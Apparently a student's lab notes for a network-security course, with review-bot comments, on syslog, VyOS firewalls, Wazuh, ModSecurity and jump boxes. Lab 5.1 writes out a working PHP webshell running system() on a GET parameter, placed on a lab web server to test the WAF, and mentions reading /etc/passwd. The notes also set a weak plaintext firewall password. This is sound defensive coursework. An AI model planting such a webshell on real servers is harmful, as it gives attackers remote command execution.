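Review bot: `addsudouser` mixes distribution families and works fully on neither: `passwd --stdin` exists only on the RHEL family, while `usermod -aG sudo` targets the Debian/Ubuntu `sudo` group (RHEL uses `wheel`); pick one family or detect it before choosing the group and the password method. The guard `if [ -z $2 ]` tests a second argument that is never passed (the menu calls `addsudouser` with none), so it is always true and the unquoted expansion would break if it were ever set; `[ -z "$1" ]`, as in `sethostname`, was probably meant. `read password` echoes the password to the terminal and the following `echo "...echo ${password} | passwd ..."` prints it a second time; use `read -s` and do not echo that command. Minor: the not-root branch should `exit 1` rather than `exit 0`, and "PLease" and "Exiting,,." are typos.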

View file

@ -0,0 +1,23 @@
# Lab 2.1 Standardizing on Time
Time is not recorded consistently across all of our systems. You will note very quickly that none of your systems record the timezone within the syslog entry. Without this data it is very hard to develop a cohesive timeline for events that span multiple log sources and multiple time zones. We are going to fix this.
Though the date is set for EST, the specific log entry that may or may not be forwarded to a log server has no indication of the timezone or the year.
![image](../../../assets/9f753b28-fd3b-4854-b155-54bca96e239c.png)
## rw01 - ubuntu
We fix this by commenting out a line (shown below) in RW01's main `/etc/rsyslog.conf` file. By default, rsyslog does not use high precision timestamps. Make sure to restart rsyslog on rw01
![image](../../../assets/8ed3b550-988b-432c-895e-3f1e3acceb45.png)
![image](../../../assets/aa578b16-2113-4af0-b7c7-ae18e52ad336.png)
## web01 & log01 - rocky
in `/etc/rsyslog.conf`
- add these lines:
- `$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format`---enables RFC 5424-style syslog format, which includes high-precision timestamps with timezone information.
- `template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")`---explicitly defines a custom template, including high-fidelity timestamps with timezone info
- add the suffix `;BetterTiming` to the loggging destination---enables the custom template on your logs
![image](../../../assets/0331dde8-2028-445d-89e2-d55fb5b3cf45.png)
![image](../../../assets/742df745-1a26-4c6d-a082-d7edfa04fd2f.png)
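Review bot: the line to comment out on rw01 (first paragraph under "rw01 - ubuntu") exists only in a screenshot; write it out in text so the step is searchable and copyable. Also "loggging" in the last bullet is a typo, and the `---` separators inside the bullets render as literal dashes in Markdown; a colon or a parenthetical reads better.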

View file

@ -0,0 +1,66 @@
# Lab 2.2 - Syslog Organization on log01
## setup mgmt01
- on LAN
- ip: 172.16.150.10
- DG & DNS: 172.16.150.2
### configure fw01 with the LAN
#### NAT rules on fw01, to set NAT for LAN to WAN
```
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
```
#### DNS forwarding from LAN to WAN
```
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
```
mgmt01 should now be able to ping google.com
### Install chrome remote desktop on mgmt01
- open chrome
- sign in with school email and turn on sync
- go to remotedesktop.google.com, install the app if you want
- on main host (laptop, go to `https://g.co/crd/headless`), download and install the package:
- there might be dependency issues, this command worked on my computer: `sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb`
- `sudo dpkg -i google-chrome-stable_current_amd64`
- still on main host, click next and copy the command for the remote OS (in our case, debian)
- paste it in the remote terminal, and create a PIN
- at this point you should be able to access mgmt01 via chrome remote desktop, you might need to update CRD on mgmt01 first though, but we know how to do that ^
- IMPORTANT: log out of the remote computer before attempting to connect
## log organization on log01
Having all of our remote logs stuffed into log01's /var/log/messages or /var/log/secure is not helpful. Remote logs should be segregated and ideally stored on reliable and redundant storage in a manner that supports dealing with discrete event types. We are going to store logs in a directory hierarchy in order to provide this organization.
- re-comment the input modules from lab 1.1
![image](../../../assets/a51c6beb-41a7-4885-a285-61885f073995.png)
- create a new config file call sec350.conf:
![image](../../../assets/c12ab0af-4ef2-4904-9ede-9d4d96a65122.png)
- copy that file to /etc/rsyslod.d/: `sudo cp sec350.conf /etc/rsyslog.d/`
```
This configuration file (03-sec350.conf) will dynamically create and name files based upon hostname,
date and process name. Input over udp 514 is associated with the RemoteDevice ruleset which in turn
uses the dynamic template configuration called “DynFile”.
```
testing \
![image](../../../assets/37f2c335-0611-42c9-962a-62a4681eeae5.png)
![image](../../../assets/3b863e99-1ae4-4d29-91cb-1a3b187aab5f.png)
## web01: Logging Authorization Events
Modify the rsyslog client configuration on web01 so that authentication events are forwarded to our log server. the line `authpriv.* @172.16.50.5` will send all authpriv logs to the remote server(log01)
![image](../../../assets/59be1bd2-d915-4360-9595-f0d32d68e030.png) \
after sshing from rw01>web01(with failed attempts), we can see this in the sshd.log file \
![image](../../../assets/f45b745c-6aff-4cd6-86dd-0ddb13256267.png)
## fw01: Logging Authorization Events
We are going to adjust the vyos configuration to send authentication messages from fw01 to log01. Note, vyos does produce a ton of useless authentication messages which we are going to have to deal with at some point.
- first, [change the default password](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/week01/vyos.md#change-password) : `set system login user vyos authentication plaintext-password password123!`
- `set system syslog host 172.16.50.5 facility authpriv level info` \
![image](../../../assets/57d3e4d5-2d74-45c7-91e1-7e0066bcaf10.png) \
![image](../../../assets/26d035b6-8587-4277-ac33-3b4824459cc8.png)
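Review bot: the rsyslog drop-in is named inconsistently: the bullet and the `cp` command use `sec350.conf`, but the quoted explanation refers to `03-sec350.conf`; rsyslog includes `/etc/rsyslog.d/*.conf` in lexical order, so the numeric prefix matters if this file must be read after the others. The prose path `/etc/rsyslod.d/` is misspelled (the command itself is correct). The NAT and DNS-forwarding blocks at the top omit `commit` and `save`, unlike Lab 1.1; one line noting that they are required would avoid a configuration that disappears on reboot.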

View file

@ -0,0 +1,7 @@
# CentOS Repo Fix
They changed the URLs for the repos for CentOS. to fix, change the repos in yum's config:
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```
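Review bot: quote the three sed expressions (`'s/mirror.centos.org/vault.centos.org/g'` and so on); unquoted, the `*` in `^#.*baseurl=http` is subject to shell globbing. Also say which CentOS release this is for: vault.centos.org holds archived, end-of-life releases, so this is the workaround for a retired mirror, and the second command un-comments every `baseurl` line in every `CentOS-*.repo` file, including repos that were deliberately disabled.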

View file

@ -0,0 +1,80 @@
# Lab 3.1 Segmentation 1
In this lab, we are going to segment our network by adding a new firewall and a new network (MGMT). We will retire our log01 server and replace it with a new server on the MGMT network.
___
# if you got this far...you can shutdown log01. this machine is no longer needed
- shutdown log01
- On web01, remove your rsyslog dropin configuration from `/etc/rsyslog.d` (comment out the `user.notice` and `authpriv.*` lines)
- On fw01, remove syslog host setting from configuration: `delete system syslog host 172.16.50.5`
___
## configure wks01 (LAN)
- IP Address: 172.16.150.50\24
- Gateway: 172.16.150.2
- DNS: 172.16.150.2
## fw01 - create a rule for NAT from MGMT to WAN
```
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
```
## fw-mgmt
![image](../../../assets/e9fe5785-ef2b-4efa-9cc2-f10c25cc9476.png) \
Configure your fw-mgmt firewall's hostname with interface descriptions and interface addresses:
- eth0: LAN- 172.16.150.3/24
- eth1: MGMT- 172.16.200.2/28 (NOTE: MGMT is using a /28!)
```
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
```
![image](../../../assets/68f108b9-2a62-4575-9614-c2ec286093ad.png)
Set the following:
- gateway next-hop: `set protocols static route 0.0.0.0/0 next-hop 172.16.150.2`
- name server to your fw01s LAN interface address: `set system name-server 172.16.150.2`
- dns forwarding such that requests are allowed from your management subnet and management interface.
```
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
```
## configure mgmt02 (MGMT)
- IP Address: 172.16.200.11/28
- Gateway: 172.16.200.2
- DNS: 172.16.200.2
## RIP on FW1 and FW-MGMT
fw01
```
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
```
fw-mgmt
```
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
```
## configure jump | wazuh-charlotte (MGMT)
- IP: 172.16.200.10/28
- Gateway: 172.16.200.2
- DNS: 172.16.200.2
### netplan configuration (an alternative to nmtui)
/etc/netplan/00-installer-config.yaml is the config file
![image](../../../assets/fee62fbf-d5a3-4564-a8a4-2c09ee5e3a9e.png)
`sudo netplan apply`
`sudo hostnamectl hostname wazuh-charlotte`
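Review bot: `172.16.150.50\24` under "configure wks01 (LAN)" uses a backslash; the prefix is `/24`. The line "if you got this far...you can shutdown log01" is an H1 in the middle of the lab, presumably meant as a note or a lower-level heading. As in Lab 2.2, none of the VyOS blocks end with `commit` and `save`.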

View file

@ -0,0 +1,39 @@
# Lab 3.2 - Wazuh
In this lab, we are going to experiment with a far more modern logging system called Wazuh. Wazuh is one of several ELK based SIEMs. We are using this one because of the relatively ease of installation as well as functionality. Unlike a traditionally syslog client and server, Wazuh allows us to install agents on supported systems. Agents can refine that information sent to their SIEM for streamlined analysis.
>[!Warning]
>TAKE A SNAPSHOT BEFORE INSTALLATION
## Installation
For a single node installation on wazuh, run the following command.
`curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i`
(added -i to ignore minimum requirements of 2CPU and 4 GB RAM)
>[!Note]
>Save the auto-generated password, you will need it later
## Wazuh/OSSEC Agent on web01
- Wazuh dropdown > management > groups > create a new group called linux
- Wazuh dropdown > agents > Deploy a new agent with the following configuration.
- Redhat/CentoS
- CentOS 6 or higher (Note, it will work on rocky 8)
- x86_64
- 172.16.200.10
- Linux
- run the generated command on web01 to install the agent:
```
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
```
- if you can't access through a web browser. try going to http://172.16.200.10/app/login. for some reason this worked for me
![image](../../../assets/c6c6ae88-635e-4db1-a1d3-e1473bf63653.png)
![image](../../../assets/1609a92a-ffe2-4d93-8477-f6669a95c2f5.png)
- start the agent
```
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## to view security events
dropdown > modules > security events
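Review bot: wording slips in the introduction: "relatively ease of installation" should be "relative ease of installation", "a traditionally syslog client and server" should be "a traditional syslog client and server", and "refine that information sent" should be "refine the information sent". Also the bullet giving `http://172.16.200.10/app/login` is at odds with the dashboard serving HTTPS on 443 by default (and with the 443 rule in the fw-mgmt firewall); if plain HTTP really is what worked, say so, otherwise the URL should be `https://`.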

View file

@ -0,0 +1,201 @@
# network firewalls 1
# Configure fw01
- Create and link firewall zones to interfaces (eth0, eth1, eth2)
```
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
```
### WAN and DMZ firewalls
In the illustration below, we have created firewalls for WAN to DMZ and DMZ to WAN,
we are going to lock them down with a default drop directive, and we will log violations of the firewall rules.
We have also assigned firewalls to the respective direction of communication between zones.
Firewalls for WAN and DMZ
```
set firewall name WAN-to-DMZ default-action drop
set firewall name DMZ-to-WAN default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name DMZ-to-WAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
```
On fw01, monitor your firewall logs with the following command:
`tail -f /var/log/messages | grep WAN`
## Allow http inbound
```
set firewall name WAN-to-DMZ rule 10 description "Allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
```
## allow return traffic
this won't work if you try to ping/curl, because traffic back out to WAN is still blocked
these commands will allow established connection through DMZ-to-WAN
```
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
```
>[!Note]
>We will reserve rule 1 for two conditions. The first is to allow established connections back out again, the second would be to have an open rule where all connections are allowed. Typically this would be the only rule in such a firewall.
## DMZ and LAN Traffic Firewalls
```
set firewall name LAN-to-DMZ default-action drop
set firewall name DMZ-to-LAN default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name DMZ-to-LAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
```
### allow ports 1514 and 1515
```
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
```
### allow return traffic from DMZ
```
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
```
### allow return traffic from LAN
```
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
```
## lan to wan?
yes, clients usually need direct access to internet. we will have to configure proxies for this later\
Create a default LAN to WAN firewall and associate it with the appropriate zone policy. This firewall will have only one rule allowing LAN clients to initiate WAN connections.
```
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
```
### allow return traffic WAN to LAN
```
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
```
## LAN to DMZ
As communication between LAN and DMZ is currently broken, we need to create a firewall, assign to the appropriate zone policy and adjust it to only allow the traffic we want to go through. We want wks01 to be able to browse to web01 and we want mgmt01 to ssh into anything on the DMZ.
With that in mind, create firewall rules on LAN-TO-DMZ that allows
- 80/tcp from LAN to web01.
```
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
```
- 22/tcp from mgmt01 to the DMZ
```
set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
```
# Configure fw-mgmt
## LAN-to-MGMT
```
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
```
Firewalls for WAN and DMZ
```
set firewall name LAN-to-MGMT default-action drop
set firewall name MGMT-to-LAN default-action drop
set firewall name LAN-to-MGMT enable-default-log
set firewall name MGMT-to-LAN enable-default-log
```
Assigning Firewalls to Zones
```
set zone-policy zone MGMT from LAN firewall name LAN-to-MGMT
set zone-policy zone LAN from MGMT firewall name MGMT-to-LAN
```
### LAN-to-MGMT firewall
allow established traffic
```
set firewall name LAN-to-MGMT rule 1 action accept
set firewall name LAN-to-MGMT rule 1 state established enable
```
allow SSH MGMT-01->wazuh
```
set firewall name LAN-to-MGMT rule 10 description "wazuh SSH access from MGMT-01"
set firewall name LAN-to-MGMT rule 10 action accept
set firewall name LAN-to-MGMT rule 10 source address 172.16.150.10
set firewall name LAN-to-MGMT rule 10 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 10 destination port 22
set firewall name LAN-to-MGMT rule 10 protocol tcp
```
allow HTTPS MGMT-01->wazuh
```
set firewall name LAN-to-MGMT rule 20 description "wazuh HTTPS access from MGMT-01"
set firewall name LAN-to-MGMT rule 20 action accept
set firewall name LAN-to-MGMT rule 20 source address 172.16.150.10
set firewall name LAN-to-MGMT rule 20 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 20 destination port 443
set firewall name LAN-to-MGMT rule 20 protocol tcp
```
allow wazuh agent communication
```
set firewall name LAN-to-MGMT rule 30 description "wazuh agent communication with server"
set firewall name LAN-to-MGMT rule 30 action accept
set firewall name LAN-to-MGMT rule 30 destination address 172.16.200.10
set firewall name LAN-to-MGMT rule 30 destination port 1514,1515
set firewall name LAN-to-MGMT rule 30 protocol tcp
```
## MGMT-to-LAN
Allows established traffic back again
```
set firewall name MGMT-to-LAN rule 1 action accept
set firewall name MGMT-to-LAN rule 1 state established enable
```
Allows MGMT to initiate any connection to the LAN
```
set firewall name MGMT-to-LAN rule 10 description "allows MGMT to LAN"
set firewall name MGMT-to-LAN rule 10 action accept
set firewall name MGMT-to-LAN rule 10 destination address 172.16.150.0/24
```
Allows MGMT to initiate any connection to the DMZ (yes, this is in the MGMT-to-LAN zone-policy, because MGMT is not directly connected to DMZ)
```
set firewall name MGMT-to-LAN rule 20 description "allows MGMT to DMZ"
set firewall name MGMT-to-LAN rule 20 action accept
set firewall name MGMT-to-LAN rule 20 destination address 172.16.50.0/29
```
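Review bot: every return-traffic rule (rule 1 in DMZ-to-WAN, DMZ-to-LAN, LAN-to-DMZ, WAN-to-LAN, LAN-to-MGMT and MGMT-to-LAN) matches only `state established enable`; add `state related enable` to each so ICMP errors tied to an existing flow (port-unreachable, fragmentation-needed) are not dropped by the default-action drop and logged as violations. Also the label "Firewalls for WAN and DMZ" above the LAN-to-MGMT/MGMT-to-LAN block under "Configure fw-mgmt" is a copy-paste leftover and should read "Firewalls for LAN and MGMT".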

View file

@ -0,0 +1,53 @@
# Lab 5.1 - Wazuf WAF
In this lab we are going to augment web01 by adding a web application firewall (WAF). The wazuh agent should currently be able to forward apache error logs so a good deal of our work is done for us already. We are then going to run malicious http requests against web01 to see how our WAF performs.
## patch fw01
>[!Warning]
> web01's ability to talk to the WAN and the WANs ability to talk to web01 might be currently restricted. Updating and patching the server is one of the things we must do from time to time. VYOS itself cannot filter by domain name such as allowing traffic to updates.centos.org. It has to be by IP address or subnet. For this reason, many organizations go to an internal mirror for this purpose. We will use a work around.
### WAN-to-DMZ
- add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ
```
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
```
### DMZ-to-WAN
temporary rule for software updates that we either delete, disable or discard when complete
```
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
```
## Adding mod_security, the core rule set and php to web01
The following command installs mod_security, the core rule set associated with this layer 7 firewall, and the PHP packages necessary to make a webshell work.
```
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
- after installation delete temporary rule on fw01
```
delete firewall name DMZ-to-WAN rule 999
```
- create a php webshell at `/var/www/html/shell.php` on web01
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
While this shell works for commands like `whoami` and `/sbin/ifconfig`, ModSecurity will prevent dangerous commands like `cat /etc/passwd` from being executed.
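Since the Wazuh agent ships web01's Apache error log, it helps to know what a blocked request looks like there. The parser below is an added example, not part of the lab or of ModSecurity; it runs over constructed `error_log` lines in the shape mod_security 2.x writes (rule ids, file paths and `unique_id` values are illustrative) and separates requests that were blocked from ones that only raised a warning.

```python
import re
from collections import Counter

# Constructed sample lines in the shape mod_security 2.x writes to the Apache
# error_log; the rule ids, paths and unique_id values are illustrative.
SAMPLE_ERROR_LOG = [
    '[Tue Mar 04 14:02:11.532210 2025] [:error] [pid 2150] [client 10.0.17.51:49812] '
    '[client 10.0.17.51] ModSecurity: Access denied with code 403 (phase 2). '
    'Matched phrase "etc/passwd" at ARGS:cmd. '
    '[file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] '
    '[line "99"] [id "930120"] [msg "OS File Access Attempt"] '
    '[data "Matched Data: etc/passwd found within ARGS:cmd: cat /etc/passwd"] '
    '[severity "CRITICAL"] [hostname "172.16.50.3"] [uri "/shell.php"] [unique_id "constructed-1"]',
    # A warning only: the request scored below the anomaly threshold and was served.
    '[Tue Mar 04 14:03:40.104455 2025] [:error] [pid 2150] [client 10.0.17.51:49820] '
    '[client 10.0.17.51] ModSecurity: Warning. Matched phrase "whoami" at ARGS:cmd. '
    '[file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] '
    '[line "300"] [id "932160"] [msg "Remote Command Execution: Unix Shell Code Found"] '
    '[severity "CRITICAL"] [hostname "172.16.50.3"] [uri "/shell.php"] [unique_id "constructed-2"]',
    # An ordinary Apache error with no ModSecurity involvement.
    '[Tue Mar 04 14:05:02.778010 2025] [core:error] [pid 2151] [client 172.16.150.10:51000] '
    'AH00128: File does not exist: /var/www/html/favicon.ico',
]

TAG_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')      # [id "930120"], [msg "..."], ...
CLIENT_RE = re.compile(r'\[client (\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\]')
DENIED_RE = re.compile(r'ModSecurity: Access denied with code (\d+)')


def parse_modsec_line(line):
    """Return the fields of one ModSecurity event, or None for any other error_log line."""
    if 'ModSecurity:' not in line:
        return None
    tags = dict(TAG_RE.findall(line))
    client = CLIENT_RE.search(line)
    denied = DENIED_RE.search(line)
    return {
        'client': client.group(1) if client else None,
        'blocked': denied is not None,          # "Warning." lines were logged but served
        'status': int(denied.group(1)) if denied else None,
        'rule_id': tags.get('id'),
        'msg': tags.get('msg'),
        'uri': tags.get('uri'),
        'severity': tags.get('severity'),
    }


def summarize(lines):
    """Count events and blocks, and which rules and clients triggered them."""
    events = [e for e in map(parse_modsec_line, lines) if e]
    return {
        'events': len(events),
        'blocked': sum(1 for e in events if e['blocked']),
        'by_rule': Counter(e['rule_id'] for e in events),
        'blocked_by_client': Counter(e['client'] for e in events if e['blocked']),
    }


if __name__ == '__main__':
    for e in filter(None, map(parse_modsec_line, SAMPLE_ERROR_LOG)):
        verdict = f"blocked ({e['status']})" if e['blocked'] else 'warned'
        print(f"{e['client']} {e['uri']} rule {e['rule_id']} {verdict}: {e['msg']}")
    print(summarize(SAMPLE_ERROR_LOG))
```

Point it at `/var/log/httpd/error_log` on web01 to compare what you see in the Wazuh dashboard with what ModSecurity actually decided for each request.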

# Lab 6.1: Port Forwarding and Jump Boxes
## RW01 -> WEB
Security issue: rw01 knows the internal routing for our DMZ and used this information to create a static route from SEC350-WAN to the DMZ. A better alternative is to mask the presence of the DMZ altogether with NAT destination rules.
- remove static ip route from rw01 to DMZ
```
sudo ip route del 172.16.50.0/29
```
## WAN to DMZ NAT
We've worked with NAT **source** rules when dealing with traffic from inside the network going out to the WAN. Now we are going to add a NAT **destination** rule (aka port forwarding) so that any port 80 traffic coming to our firewall's WAN/eth0 interface will be forwarded on to web01.
```
set nat destination rule 10 description "HTTP->WEB01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
```
## Jump server
- log01 is back, but it's a jump server now
- IP Address: 172.16.50.4/29
- hostname: jump-charlotte
- Adjust the firewall rules from LAN-TO-DMZ such that mgmt01 can ssh into any server on the DMZ.
- Make sure that fw01 is only listening for SSH on the LAN interface (172.16.150.2) and not on all interfaces (0.0.0.0/0)
![image](../../../assets/76304685-062f-41df-ac18-092174428aa2.png)
```
sudo systemctl restart ssh
```
On rw01, create a dedicated keypair that will only be used for SSH access to jump. Make sure to name the keypair something other than the default and add a comment indicating its purpose. Make sure to add a passphrase when prompted.
```
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
# name of file: jump-charlotte
```
The resulting public key (`jump-charlotte.pub`) is okay to share, unlike the private key.
Create a passwordless user called `charlotte-jump` on jump. Copy the public component of the jump keypair you just created on rw01 into the new user's `.ssh/authorized_keys` file.
```
sudo useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
# disable password authentication (match the directive whether or not it is still commented out)
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# create .ssh directory, give perms to user
sudo mkdir -p /home/charlotte-jump/.ssh
sudo chmod 700 /home/charlotte-jump/.ssh
# append the public key (tee -a, because a plain >> redirect would not run as root)
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDLLKDg5fIw8CINt5IOY3vZ6XiudxKn0sXZ1hTWbugfKQ9NZjfSCbboxIlVpyqAwnFzf+3oJcPpnlVLjXpugJe6ghfuLsO/1fdqFQ5/PBcQbJXFvdIH93MJ78sBUhT+SbhHLas6KjShSOhNz5fRYOMOTpCtB7eQhk5q3gqTEvmDejgWZPphyAQJCnB0hw+J76jl3t68Q+FtD57RWhWhp/0ZQPfjY+hnJOfLaD+Zs0tsxvYXqDuPhRt2J2xUHF8LgaqZYkosIllfcX//tmEnQ90nU+zLu3jje8Pqy4mfjGsV8wZ+ug7ModwJwR2ToieqoiyOnDq1ytG0r5sKjeM5RTX6tJTOl8ltr7E51u0bajjym0ZL4kT0W82Eld/DV4+BzbEB6yCSWWVwo/eKoqkGBIHpIibzkjPGCQ4O0tq3s+04DpOpucDqk0J+Yphdj/qmK/mYFLU0xKZnIJl8otyItyVhV2zTIn64PQ3gEE8z0O4GjEJEfhkJ29ydtXXDFIpCfSirmfH7HbXlwgUmxHJqnCBqZ8eKb/n52ekaD0SIOPQE76RmR540cus3mvo3t30Ak79NBSjEh82k2rP42eVx/GhF/o3u8DdCF3xA46dzqt1HMvOpnOjdvbldP076VKkxV/px9nE7mJZysxei8SisrSbwn7vxLem4LrDsAIxfsGcULw== ssh to jump" | sudo tee -a /home/charlotte-jump/.ssh/authorized_keys
# set perms, set new user as directory owner
sudo chmod 600 /home/charlotte-jump/.ssh/authorized_keys
sudo chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
# validate the config before restarting so a typo does not lock you out
sudo sshd -t && sudo systemctl restart sshd
```
## install wazuh agent on jump
on mgmt01
```
wget https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.3-1.x86_64.rpm
scp wazuh-agent-4.7.3-1.x86_64.rpm charlotte@172.16.50.4:~
```
on jump (the package was copied into the home directory by the scp above)
```
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
![image](../../../assets/500def07-6fb1-4fb5-82a8-4c4f433e3861.png)

# Lab 7.1 Assessment Prep
Several systems in your current environment will be removed the day before the assessment (3/27), first thing in the morning.
- **rw01** -> **traveler**
- **fw01** -> **edge01**
- **web01** -> **nginx01**
```
You are on your own for the assessment.
Open notes and internet, just no open neighbor.
This is really a test of your notes.
You will be getting new VM's.
Don't be late, as you will likely need the full time.
```
## fw01 configuration Backup
- **edge01**: (this new firewall will be very close in configuration).
- You might also consult the example week 4 configurations [here](../configs/fw01/fw01.config.week04.txt)
- Provide the raw commands necessary to reconstitute your firewall: (Remember, there may be some adjustments in IP addresses and rules for your internal systems.)
## Assessment Description
For the assessment, you will be given a 3 zone network to configure that consists of:
- **traveler**. A WAN based road warrior user running Windows 10. (this replaces the linux rw01)
- **edge01**. A VyOS firewall with three interfaces (WAN, DMZ, LAN). You will need to add an interface using vCenter. (this replaces fw01)
- **nginx01**. A DMZ based nginx web server running Ubuntu (this replaces web01 and apache)
- **dhcp01**. A LAN based dhcp server running Ubuntu
## Requirements
- All systems should have an accurate hostname.
- All Linux systems should have a named sudo or administrator user.
- The two new Ubuntu systems do not have a host firewall enabled; this is ok (for now)
- wks1, mgmt01 should be able to surf the internet.
- wks1, mgmt01 should be able to navigate to nginx01
- mgmt01 should be able to ssh to nginx01
- nginx01 and dhcp01 should have wazuh agents installed and be able to connect to wazuh
- nginx01 should have a custom web page (practice this on jump)
- traveler should be able to get to nginx01's custom test page by navigating to edge01's WAN IP address.
- traveler should be able to perform ssh keybased authentication with jump. Traveler is a Windows box, but ssh on powershell is nearly exactly the same as linux to include key generation. You will need to add a new public key to authorized_keys.
- dhcp01 should serve a pool of dhcp addresses to the LAN from .100 to .150.
- WKS1 should use dhcp addressing
## Hints
- You do not need to work serially through this assessment, it is the end result that matters. If you are waiting for a reboot on traveler, then start configuring your other servers.
- Get all communications working BEFORE creating zones and locking down the firewalls. It's terribly difficult to debug both services and network firewalls at the same time.
- Make sure to link your firewalls to the appropriate From and To zones.
- Make sure you have the correct netmask on all Linux systems.
- Restart any service if you touch a configuration file (network, nginx, rsyslog, etc…).
- Make sure you include the appropriate vsphere label on all deliverables where your name is not obvious in the console.
- Check every VM's network settings to make sure they are on the correct segment.
